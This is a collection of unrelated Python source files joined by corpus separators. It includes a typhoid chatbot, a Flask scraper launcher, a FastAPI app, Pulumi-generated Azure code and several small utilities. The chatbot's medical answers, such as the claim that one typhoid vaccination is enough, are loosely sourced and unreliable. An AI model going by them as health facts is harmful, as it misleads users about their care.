    # The two original symptom branches used the same text; merged here.
    if message in ("symptoms", "what are the symptoms of typhoid fever"):
        return respond(f"common signs and symptoms include\n persistent high fever\n sweeting \n headache \n abdominal discomfort \n loss of appetite \n diarrhea or constipation \n nausea \n general body weakeness \n if untreated typhoid can result life threatening intestinal bleeding and perfoation,hepatitis,mental problems and infections of the lungs and heart")
    if message == "vaccination centers":
        return respond(".......................................................")
    if message == "hygine tips":
        return respond("wash your hands throughly with soup and running water\nTry to eat your whilst its hot\n")
    if message == "covid19":
        return respond("Contact this number for mor infomation on Covid19 0714734593")
    if message == "share_this_service":
        return respond("For all who want to know about Typhoid vaccination")
    if message in ("what is typhoid vaccination", "vaccination", "immunisation"):
        return respond(f"typhoid vaccination is vaccination against typhoid.it is given to prevent your child from typhoid in case/in cases where the child is exposed to contamneted food or water.")
    if message in ("where can i get vaccinated", "where can i get treated", "treated"):
        return respond(f"At any clinic or hospital near you.Where do you stay ?.")
    if message in ("vaccination is for what age", "age of vaccination", "age"):
        return respond(f"it is for children aged between 9 months and below 15 years")
    if message == "what are the benefits of vaccination":
        return respond(f"your child is protected in the event of a typhoid outbreak")
    if message in ("what are the side effects of this vaccine", "effects of vaccine", "effects"):
        return respond(f"visit your nearest clinic or hospital for checkup if you suspect any side effects")
    if message in ("how long does the vaccine last", "vaccine duration"):
        return respond(f"visit your nearest clinic or hospital for vaccine duration they will assist and give you more infomation")
    if message in ("if i have been vaccinated before when do i need to get vaccinated again", "when do i get vaccinated"):
        return respond(f"You will be notified by the ministry of health and child care,or at your nearest clinic.")
    if message in ("are there any effects of being vaccinated twice", "effects of being vaccinated"):
        return respond(f"No but you should only be vacinated once.")
    if message in ("how is the vaccine administered", "administered"):
        return respond(f"it is administerd by injection into the left thigh for children under five years and left upper arm for children above five years.")
    if message in ("what else do i need to do after vaccination", "after vaccination"):
        return respond(f"Remember after vaccination against typhoid it remains important to mantain good personal and food hygene by drinking boiled or treated water,washing hands with soup before eating and after using the toilet,eating food whilst hot and getting early treatment if you or family member is sick")
    if message in ("i have been vaccinated for covid19 do i need to be vaccinated for typhoid", "do i need to be vaccinated"):
        return respond(f"Yes you need to be vaccinated")
    if message == "will the covid19 vaccine affect typhoid vaccine":
        return respond(f"No it does not")
    if message in ("where can i get more infomation on vaccines", "more infomation"):
        return respond(f"At your nearest clinic or call the ministry of health toll free number 2019,393")
    # Fallback so every request gets a valid response.
    return respond("Sorry, that keyword was not recognised. Reply with hi to see the menu.")
if __name__=="__main__":
    # Local development entry point; production should use a WSGI server.
    app.run()
| StarcoderdataPython |
4824496 | <reponame>saifuddin779/data-collector
import sys, os, ast, json, requests
from subprocess import call, Popen, PIPE, STDOUT
from flask import Flask, render_template, request
app = Flask(__name__)
app.debug = True
@app.route('/')
def index():
    """Root endpoint; static placeholder used as a liveness check."""
    return 'index page'
@app.route('/begin/')
def begin():
    """Start a profile scrape for one country inside the 'scrap_session' tmux session.

    Query params: index (int resume offset), country_code (str).

    Fixes vs. the original:
    - Dropped ``.encode('utf-8')`` on country_code: it produced bytes, so the
      ``%s`` substitution rendered ``b'...'`` inside the shell command.
    - The untrusted query parameter is shell-quoted before being interpolated
      into the tmux command (shell injection via country_code was possible).
    """
    import shlex

    start_index = int(request.args['index'])
    country_code = request.args['country_code']
    inner = "python parse_profiles.py %s prod %d" % (country_code, start_index)
    command = "tmux send -t scrap_session.0 %s ENTER" % shlex.quote(inner)
    p = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, bufsize=1, close_fds=True)
    return {'status': True}
if __name__ == '__main__':
    # Listens on all interfaces; app.debug=True is set above, so do not
    # expose this directly to untrusted networks.
    app.run(host='0.0.0.0')
| StarcoderdataPython |
3245560 | <filename>backend/app/main.py
import os
import uvicorn
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles
from starlette.middleware.cors import CORSMiddleware
from app.api.router import api_router
from app.core.config import settings
from app.core.logging import setup_logging
from app.middleware.logger import LoggerMiddleware
from app.utils.package_info import get_metadata
prefix = settings.BASE_PREFIX

# All documentation endpoints live under the configured API prefix;
# root_path supports deployment behind a reverse proxy.
app = FastAPI(
    **get_metadata(),
    openapi_url=f"{prefix}/openapi.json",
    docs_url=f"{prefix}/docs",
    redoc_url=f"{prefix}/redoc",
    root_path=os.environ.get("ROOT_PATH", ""),
)

logger = setup_logging()
# Register request logging as HTTP middleware.
app.middleware("http")(LoggerMiddleware(logger=logger))

# Set all CORS enabled origins
if settings.BACKEND_CORS_ORIGINS:
    app.add_middleware(
        CORSMiddleware,
        allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],
        allow_credentials=True,
        allow_methods=["*"],
        allow_headers=["*"],
    )

app.include_router(api_router, prefix=prefix)
# Mounted on the app rather than inside the images router because of
# https://github.com/tiangolo/fastapi/issues/1469
app.mount(f"{prefix}/images", StaticFiles(directory=settings.IMAGE_DIR), name="images")
if __name__ == "__main__":
    # Dev entry point with auto-reload; production runs via an ASGI server.
    uvicorn.run("main:app", host="0.0.0.0", reload=True, port=8888)
| StarcoderdataPython |
3259511 | """nestedcaller.py - A high-order function to call nested multiple functions.
Fast & Picklable.
"""
# Public API: only the nestedcaller class is exported.
__all__ = ['nestedcaller']
class nestedcaller:
    """Compose callables left-to-right: nestedcaller(f, g)(x) == g(f(x)).

    Plain nestedcaller arguments are flattened into a single tuple so
    composition stays shallow; instances are immutable and picklable.

    Fixes vs. the original: removed the dead ``assert type(args) is tuple``
    (``*args`` is always a tuple), and ``__call__`` no longer re-imports
    functools.reduce on every invocation.
    """
    __slots__ = '_funcs',

    def __new__(cls, *args):
        if not all(map(callable, args)):
            raise TypeError('not callable')
        self = super(nestedcaller, cls).__new__(cls)
        flat = []
        for func in args:
            # Flatten only exact nestedcaller instances, and only when
            # constructing the base class itself (subclasses keep nesting).
            if cls != nestedcaller or type(func) != nestedcaller:
                flat.append(func)
            else:
                flat.extend(func.funcs)
        self._funcs = tuple(flat)
        return self

    @property
    def funcs(self):
        """The flattened tuple of composed callables."""
        return self._funcs

    def __reduce__(self):
        # Pickle as (class, funcs): unpickling re-runs __new__ with the
        # already-flattened tuple.
        return type(self), self._funcs

    def __call__(self, x):
        result = x
        for func in self._funcs:
            result = func(result)
        return result

    def __repr__(self):
        return '%s.%s(%s)' % (
            __name__, type(self).__qualname__,
            ', '.join(map(repr, self._funcs)))
try:
    # raise ImportError() # for debug
    # Prefer the C implementation when available; it shadows the pure-Python
    # class defined above.
    from _nestedcaller import nestedcaller
except ImportError:
    from warnings import warn
    warn('import native version of nestedcaller module has failed. using python version')
| StarcoderdataPython |
# Demonstrate set difference: colors in the first collection but not the second.
color_list_1 = {"White", "Black", "Red"}
color_list_2 = {"Red", "Green"}
a = color_list_1.difference(color_list_2)
print(a)
1780186 | #!/usr/bin/env python3
import re
import subprocess
import sys
_LENGTH = 20  # width of the notification progress bar, in characters

# Optional command-line argument: '+' / '-' adjusts the backlight by 10%
# before the current level is reported.
try:
    action = sys.argv[1]
except IndexError:  # fix: was a bare except, which also hid real errors
    action = None

if action == "+":
    subprocess.call(["xbacklight", "-inc", "10"])
elif action == "-":
    subprocess.call(["xbacklight", "-dec", "10"])

# xbacklight prints the current brightness as a number; grab its integer part.
brightre = re.compile(r"(\d+)")
ret = subprocess.check_output(["xbacklight"]).decode()
m = brightre.search(ret)
if m is not None:
    brightness = int(m.group(1))
    summary = "<b>Brightness [{}%]</b>\n".format(brightness)
    ticks = int(brightness / 100.0 * _LENGTH)
    body = "█" * ticks
    body += "▁" * (_LENGTH - ticks)
    # The whole notification is inside the match guard so 'brightness' can
    # never be referenced unbound when xbacklight output is unexpected.
    # "DUNST_COMMAND_REPLACE" makes dunst replace the previous notification.
    subprocess.call(["notify-send", "-u", "low", "DUNST_COMMAND_REPLACE" + summary + body])
134488 | <filename>config.py
import configparser
from sqlalchemy import create_engine
# Load settings from config.txt; the [database] section's 'con' entry holds
# the full SQLAlchemy connection URL.
config = configparser.ConfigParser()
config.read('config.txt')
engine = create_engine(config.get('database', 'con'))
96340 | # Copyright (c) 2017 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
"""
Guidelines for writing new hacking checks
- Use only for Omni-specific tests. OpenStack general tests
should be submitted to the common 'hacking' module.
- Pick numbers in the range O3xx. Find the current test with
the highest allocated number and then pick the next value.
If nova has an N3xx code for that test, use the same number.
- Keep the test method code in the source file ordered based
on the O3xx value.
- List the new rule in the top level HACKING.rst file
- Add test cases for each new rule to omnitests/test_hacking.py
"""
# Matches e.g. assertTrue(isinstance(a, b)); both fragments are raw strings --
# the second half was previously a plain string, so \w, \., \[ etc. were
# invalid escape sequences (a DeprecationWarning, and an error in future Pythons).
asse_trueinst_re = re.compile(
    r"(.)*assertTrue\(isinstance\((\w|\.|\'|\"|\[|\])+, "
    r"(\w|\.|\'|\"|\[|\])+\)\)")
def assert_true_instance(logical_line):
    """Check for assertTrue(isinstance(a, b)) sentences

    O316
    """
    # Reviewers should use assertIsInstance instead of the combined form.
    matched = asse_trueinst_re.match(logical_line)
    if matched:
        yield (0, "O316: assertTrue(isinstance(a, b)) sentences not allowed")
def factory(register):
    # Hacking-framework entry point: register every local check defined
    # in this module so flake8 picks them up.
    register(assert_true_instance)
| StarcoderdataPython |
1795003 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['TransformArgs', 'Transform']
@pulumi.input_type
class TransformArgs:
    # NOTE: generated by the Pulumi Terraform bridge -- do not edit by hand.
    # Values are stored/retrieved via pulumi.set/pulumi.get keyed by the
    # snake_case property name; @pulumi.getter maps it to the camelCase wire name.
    def __init__(__self__, *,
                 media_services_account_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None):
        """
        The set of arguments for constructing a Transform resource.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        pulumi.set(__self__, "media_services_account_name", media_services_account_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if outputs is not None:
            pulumi.set(__self__, "outputs", outputs)

    @property
    @pulumi.getter(name="mediaServicesAccountName")
    def media_services_account_name(self) -> pulumi.Input[str]:
        """
        The Media Services account name. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "media_services_account_name")

    @media_services_account_name.setter
    def media_services_account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "media_services_account_name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional verbose description of the Transform.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this Transform. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]:
        """
        One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        return pulumi.get(self, "outputs")

    @outputs.setter
    def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]):
        pulumi.set(self, "outputs", value)
@pulumi.input_type
class _TransformState:
    # NOTE: generated by the Pulumi Terraform bridge -- do not edit by hand.
    # Mirror of TransformArgs with every field optional: used only to look up
    # and filter existing Transform resources (see Transform.get).
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 media_services_account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Transform resources.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        if description is not None:
            pulumi.set(__self__, "description", description)
        if media_services_account_name is not None:
            pulumi.set(__self__, "media_services_account_name", media_services_account_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if outputs is not None:
            pulumi.set(__self__, "outputs", outputs)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional verbose description of the Transform.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="mediaServicesAccountName")
    def media_services_account_name(self) -> Optional[pulumi.Input[str]]:
        """
        The Media Services account name. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "media_services_account_name")

    @media_services_account_name.setter
    def media_services_account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "media_services_account_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this Transform. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]:
        """
        One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        return pulumi.get(self, "outputs")

    @outputs.setter
    def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]):
        pulumi.set(self, "outputs", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)
class Transform(pulumi.CustomResource):
    # NOTE: generated by the Pulumi Terraform bridge -- do not edit by hand.
    # The two __init__ overloads (positional TransformArgs vs. keyword
    # properties) are dispatched at runtime by the real __init__ below.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 media_services_account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Transform.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azure as azure
        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[azure.media.TransformOutputArgs(
                relative_priority="Normal",
                on_error_action="ContinueJob",
                builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                    preset_name="AACGoodQualityAudio",
                ),
            )])
        ```
        ### With Multiple Outputs
        ```python
        import pulumi
        import pulumi_azure as azure
        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[
                azure.media.TransformOutputArgs(
                    relative_priority="Normal",
                    on_error_action="ContinueJob",
                    builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                        preset_name="AACGoodQualityAudio",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="ContinueJob",
                    audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs(
                        audio_language="en-US",
                        audio_analysis_mode="Basic",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="StopProcessingJob",
                    face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs(
                        analysis_resolution="StandardDefinition",
                    ),
                ),
            ])
        ```
        ## Import
        Transforms can be imported using the `resource id`, e.g.
        ```sh
        $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: TransformArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Transform.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azure as azure
        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[azure.media.TransformOutputArgs(
                relative_priority="Normal",
                on_error_action="ContinueJob",
                builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                    preset_name="AACGoodQualityAudio",
                ),
            )])
        ```
        ### With Multiple Outputs
        ```python
        import pulumi
        import pulumi_azure as azure
        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[
                azure.media.TransformOutputArgs(
                    relative_priority="Normal",
                    on_error_action="ContinueJob",
                    builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                        preset_name="AACGoodQualityAudio",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="ContinueJob",
                    audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs(
                        audio_language="en-US",
                        audio_analysis_mode="Basic",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="StopProcessingJob",
                    face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs(
                        analysis_resolution="StandardDefinition",
                    ),
                ),
            ])
        ```
        ## Import
        Transforms can be imported using the `resource id`, e.g.
        ```sh
        $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1
        ```
        :param str resource_name: The name of the resource.
        :param TransformArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads above.
        resource_args, opts = _utilities.get_resource_args_opts(TransformArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       media_services_account_name: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required properties.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = TransformArgs.__new__(TransformArgs)
            __props__.__dict__["description"] = description
            if media_services_account_name is None and not opts.urn:
                raise TypeError("Missing required property 'media_services_account_name'")
            __props__.__dict__["media_services_account_name"] = media_services_account_name
            __props__.__dict__["name"] = name
            __props__.__dict__["outputs"] = outputs
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
        super(Transform, __self__).__init__(
            'azure:media/transform:Transform',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            media_services_account_name: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Transform':
        """
        Get an existing Transform resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _TransformState.__new__(_TransformState)
        __props__.__dict__["description"] = description
        __props__.__dict__["media_services_account_name"] = media_services_account_name
        __props__.__dict__["name"] = name
        __props__.__dict__["outputs"] = outputs
        __props__.__dict__["resource_group_name"] = resource_group_name
        return Transform(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        An optional verbose description of the Transform.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="mediaServicesAccountName")
    def media_services_account_name(self) -> pulumi.Output[str]:
        """
        The Media Services account name. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "media_services_account_name")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name which should be used for this Transform. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def outputs(self) -> pulumi.Output[Optional[Sequence['outputs.TransformOutput']]]:
        """
        One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        return pulumi.get(self, "outputs")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "resource_group_name")
| StarcoderdataPython |
3368907 | # Driver for running the FCEA2m executable
# <NAME>, Project Caelus, 12/14/2019
import os
import sys
import time
import subprocess
import threading
import pyautogui
def type_with_delay(dir_name: str, delay: float) -> None:
    """Sleep for *delay* seconds, then type *dir_name* followed by Enter.

    Runs on a background thread so the keystrokes land in the FCEA2m
    console prompt after the executable has started and taken focus.

    Note: the original annotation ``int or float`` evaluated to just
    ``int``; a plain ``float`` annotation also accepts ints (PEP 484).
    """
    time.sleep(delay)
    pyautogui.typewrite(dir_name)
    pyautogui.press("enter")
if __name__ == "__main__":
    print("Please enter the path to (and including) the .inp file. Current directory: {}".format(os.getcwd()))
    dir_name = input("Example: \"ethanol-95-n2o/ethanol-95-n2o.inp\": ")
    while not os.path.exists(dir_name):
        if dir_name == "0":
            sys.exit(0)
        print("Path invalid. Please try again. Current directory: {}".format(os.getcwd()))
        dir_name = input("Please enter the path to (and including) the .inp file (enter 0 to exit): ")
    # Strip only the extension. The old code cut at the *first* dot
    # (dir_name.index(".")), which mangles paths containing dots elsewhere.
    dir_name = os.path.splitext(dir_name)[0]
    print(dir_name)
    # FCEA2m prompts for the input-file name on its console; the background
    # thread types it in shortly after the executable starts.
    t1 = threading.Thread(target=type_with_delay, args=(dir_name, 0.25), daemon=True)
    t1.start()
    subprocess.call(["FCEA2m.exe"])
    t1.join()
    # os.path.basename replaces the buggy manual scan: the original filter
    # `val == "/" or "\\"` was always true ("\\" is truthy), so it collected
    # every index in the string, not just the separators.
    print("Operation complete. {}.out saved to {}.out".format(os.path.basename(dir_name), dir_name))
| StarcoderdataPython |
3318568 | <filename>pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/meraki/configure.py
'''IOSXE configure functions for meraki'''
# Python
import re
import time
# Genie
from genie.utils.timeout import Timeout
# Banner
from pyats.log.utils import banner
# Logger
import logging
log = logging.getLogger(__name__)
# Unicon
from unicon import Connection
from unicon.core.errors import (
SubCommandFailure,
TimeoutError,
ConnectionError,
)
from unicon.eal.dialogs import Statement, Dialog
def configure_meraki_register(device, token, mac_address):
    """
    This method is used to register the device to meraki dashboard
    It uses token, mac-address
    Args:
        device ("obj"): Device object
        token ("str"): Token used for registration eg: <PASSWORD>
        mac_address: MAC Address of the device eg: 00:18:0a:00:58:ef
    Raises:
        Exception
    Returns:
        True if succeeded else False
    """
    # Interactive prompts raised by "service meraki register"; each Statement
    # answers one console prompt in order (token, confirm, MAC, confirm).
    dialog = Dialog([
        Statement(
            pattern=r"Enter token for switch +(\d+):",
            action="sendline({})".format(token),
            loop_continue=True,
            continue_timer=False,
        ),
        Statement(
            pattern=r"Check if token is entered correctly? \[confirm\].*",
            action="sendline()",
            loop_continue=True,
            continue_timer=False,
        ),
        Statement(
            pattern=r"Enter Mac addr or just Return to use switch's Base Mac Addr. Enter Mac Addr for switch +(\d+) in hh:hh:hh:hh:hh:hh:",
            action="sendline({})".format(mac_address),
            loop_continue=True,
            continue_timer=False,
        ),
        # Final confirmations end the dialog loop (loop_continue=False).
        Statement(pattern=r"Check if mac address is entered correctly? \[confirm\].*",
                  action='sendline()',
                  loop_continue=False,
